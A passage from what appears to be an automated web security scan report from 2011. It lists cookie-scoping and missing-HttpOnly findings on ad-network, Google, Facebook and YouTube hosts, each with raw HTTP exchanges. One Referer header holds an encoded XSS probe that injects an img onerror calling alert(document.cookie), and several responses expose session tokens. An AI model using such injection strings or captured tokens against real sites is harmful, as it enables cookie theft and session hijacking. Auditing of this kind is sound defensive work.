Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Location: /cgi-bin/opt_out_verify.cgi
Content-Type: text/plain
Date: Sun, 04 Sep 2011 11:12:45 GMT
Connection: close
Set-Cookie: CMS=1; domain=.burstnet.com; path=/; expires=Mon, 06-Jun-2011 11:12:44 GMT
Set-Cookie: CMP=1; domain=.burstnet.com; path=/; expires=Mon, 06-Jun-2011 11:12:44 GMT
Set-Cookie: TData=1; domain=.burstnet.com; path=/; expires=Mon, 06-Jun-2011 11:12:44 GMT
Set-Cookie: TID=1; domain=.burstnet.com; path=/; expires=Mon, 06-Jun-2011 11:12:44 GMT
Set-Cookie: BOO=opt-out; domain=.burstnet.com; path=/; expires=Fri, 02-Sep-2016 11:12:44 GMT
Set-Cookie: 56Q8=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=.www.burstnet.com


15.153. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 04-Oct-2011 04:30:02 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.146.43
Connection: close
Date: Sun, 04 Sep 2011 04:30:02 GMT
Content-Length: 0


15.154. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Friends-of-The-Nation/147232991936

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/Friends-of-The-Nation/147232991936 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/NationNews
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFriends-of-The-Nation%2F147232991936; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.44
Connection: close
Date: Sun, 04 Sep 2011 04:29:35 GMT
Content-Length: 0


15.155. http://www.google.com/reader/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /reader/view/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reader/view/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
X-Reader-Google-Version: 546-000
Set-Cookie: SID=DQAAAO4AAAAdw-kaWu-Fwov6yR3LF5btRLGDJizUC9Raw-GqwLpasp50X9kbEGhwdFFWxcYXI6vBoZEjrRXVWtyYlNaY91rEqAzamUbDKHampxxkPLqMizg3O5oUyc70ZHiy4dZUyuRHQCXe2W5mn8nTZG6xBVeakd7uOtTtTw-4Eq-poXmbgVf-0J8etvwWsuVWzeC-uRjBpg6L4g-5Dw-fRjaHoozF0M7YxWMNbpqla2dOd6JS_ObnJKhIR1Y2k1Q-6HT1rHp85PXH5dE8SArpn0A5Ov1JEw-6AL1W9up9w8rOdgP7XrJglYeTt2h6xTlDPnLG2mY;Domain=.google.com;Path=/;Expires=Wed, 01-Sep-2021 04:30:17 GMT
X-Reader-User: 17465033393070012425
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Sun, 04 Sep 2011 04:30:17 GMT
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><!--
Content-type: Preventing XSRF in IE.

-->
<head><meta http-equiv="X-UA-Compatible" content="chrome=
...[SNIP]...

15.156. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout_pure.php?cookie_test=true HTTP/1.1
Host: www.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mojo3=10105:9432/13966:3335/3484:36959; mojo2=10105:9432/3484:8030; svid=OPT-OUT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sun, 04 Sep 2011 11:34:23 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 11:34:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 11:34:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mojo1=deleted; expires=Sat, 04-Sep-2010 11:34:22 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo2=deleted; expires=Sat, 04-Sep-2010 11:34:22 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo3=deleted; expires=Sat, 04-Sep-2010 11:34:22 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>

15.157. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_pure.php?nocache=0.3308143 HTTP/1.1
Host: www.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=10105:9432/13966:3335/3484:36959; mojo2=10105:9432/3484:8030

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sun, 04 Sep 2011 11:32:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: /optout_pure.php?cookie_test=true
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 11:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 11:32:00 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: svid=OPT-OUT; expires=Wed, 01-Sep-2021 11:32:00 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>

15.158. http://www.nexac.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai_optout.php?nocache=0.8033839 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml",CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo IVAa IVDa HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=ignore; expires=Fri, 11-Feb-2028 11:14:02 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Location: http://www.nexac.com/nai_verify.php
Content-type: text/html
Content-Length: 0
Date: Sun, 04 Sep 2011 11:14:02 GMT
Server: lighttpd/1.4.18


15.159. http://www.wtp101.com/casale_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /casale_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /casale_sync?cm_dsp_id=2&cm_user_id=qPptfUPS1JUAAD6emfQAAAAa&cm_callback_url=http%3A%2F%2Fr.casalemedia.com%2Frum HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 03:03:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://r.casalemedia.com/rum?cm_dsp_id=2&external_user_id=9ce25df1-8701-4684-948e-35b3d6998d9a
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=9ce25df1-8701-4684-948e-35b3d6998d9a; path=/; expires=Tue, 03 Sep 2013 03:03:54 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


15.160. http://www.wtp101.com/pull_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=openx HTTP/1.1
Host: www.wtp101.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=99863551&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/99863551/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b354a4f636f41446f5675?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india6a976%22%3E%3Cimg+src%3Da+onerror%3Dalert%28document.cookie%29%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/99863551?
Cookie: tuuid=9ce25df1-8701-4684-948e-35b3d6998d9a

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 03:56:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://r.openx.net/set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=161ef36d-6400-4423-ba43-31cc5143ed22
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=161ef36d-6400-4423-ba43-31cc5143ed22; path=/; expires=Tue, 03 Sep 2013 03:56:13 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


15.161. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:45:37 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=fb9357de7d7cb21a75c15aa9010c2cc8cwsAAAAzVVMyF3tqTmMCcQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pc2pRNk9sazdfMmQ0ck9qTmYtN3o5cTJhOHMyNFlLQVd1SldxbGhieldOdXdJc2JWQ2xVMF9n -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

15.162. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:45:43 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=246b11d3c187ad1cd74971bd40aa9013cwsAAAAzVVMyF3tqTmMCdw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html id="watch-html">
<head>
<script>
var yt = yt || {};yt.timing = yt.timing || {};yt.timing.tick = function(label, opt_time) {var timer = yt.timing['timer'] || {};if(opt_t
...[SNIP]...

15.163. http://www9.effectivemeasure.net/v4/em_dimg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_dimg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v4/em_dimg?flag=2&v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180&vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180&hl=&sv=-1&pv=&pn=&p=aHR0cDovL3d3dy5uYXRpb25tdWx0aW1lZGlhLmNvbS8%3D&r=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaD9zb3VyY2VpZD1jaHJvbWUmaWU9VVRGLTgmcT1iYW5na29rK3RoYWlsYW5kK25ld3M%3D&f=1&ns=_em&rnd=0.43564966856501997&u=cat2_id%3D541.552057%26&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180135_458

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vt=37bd2e98f8eef49d6359b9e202024e62e18088e413-981323754e62e184; expires=Wed, 29-Aug-2012 02:25:08 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=c45e6f4d21959b13f4050d7277324e62e18088e4f8-084548474e62e184135_458; expires=Sun, 04-Sep-2011 02:55:08 GMT; path=/; domain=.effectivemeasure.net
Content-type: image/gif
Content-Length: 49
Date: Sun, 04 Sep 2011 02:25:08 GMT
Server: C10

GIF89a...................!.......,...........T..;

15.164. http://www9.effectivemeasure.net/v4/em_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5uYXRpb25tdWx0aW1lZGlhLmNvbS8%3D&r=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaD9zb3VyY2VpZD1jaHJvbWUmaWU9VVRGLTgmcT1iYW5na29rK3RoYWlsYW5kK25ld3M%3D&f=1&ns=_em&rnd=0.828509088139981&u=cat2_id%3D541.552057%26&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vt=cff6b95a3706f313acc9b9e202024e62e18088e413-981323754e62e181; expires=Wed, 29-Aug-2012 02:25:05 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=5fe7a94f70408cf438e50d7277324e62e18088e4f8-084548474e62e181135_458; expires=Sun, 04-Sep-2011 02:55:05 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 369
Date: Sun, 04 Sep 2011 02:25:05 GMT
Server: C10

_em._domain="nationmultimedia.com";_em.setCkVt("cff6b95a3706f313acc9b9e202024e62e18088e413-981323754e62e181");_em.setCkV("5fe7a94f70408cf438e50d7277324e62e18088e4f8-084548474e62e181");_em.setCkSv("-1"
...[SNIP]...

16. Cookie without HttpOnly flag set  previous  next
There are 221 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



16.1. http://223.165.24.159/toiwidget/jsp/widget.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://223.165.24.159
Path:   /toiwidget/jsp/widget.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /toiwidget/jsp/widget.jsp HTTP/1.1
Host: 223.165.24.159
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:04:00 GMT
Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Set-Cookie: JSESSIONID=94BF0E17A9A49F1193F419E64CA53818.WIDGET01; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 11192


    <link href="../css/style.css" rel="stylesheet" type="text/css" /><div class="box">    <h2>        <div class="fl" id="cityId"></div>                <div class="fr" style="width:85px; text-align:right; mar
...[SNIP]...

16.2. http://ad.wsod.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?view=privacy&action=optout&nocache=0.8140653 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 04 Sep 2011 10:59:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: ADSESSID=s79st69i3l59m5pjm835m69qp0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u=OPT_OUT; expires=Fri, 02-Sep-2016 10:59:26 GMT; path=/
Set-Cookie: ub=OPT_OUT; expires=Fri, 02-Sep-2016 10:59:26 GMT; path=/; domain=.wsod.com
Location: nai_status/optout_check.php
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


16.3. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:05:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=606685983
Location: http://advertising.aol.com/token/4/3/606685983/
Expires: Sun, 04 Sep 2011 11:05:02 GMT
Content-Length: 0
Content-Type: text/html


16.4. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:04:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=110979794
Location: http://advertising.aol.com/token/5/3/110979794/
Expires: Sun, 04 Sep 2011 11:04:45 GMT
Content-Length: 0
Content-Type: text/html


16.5. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
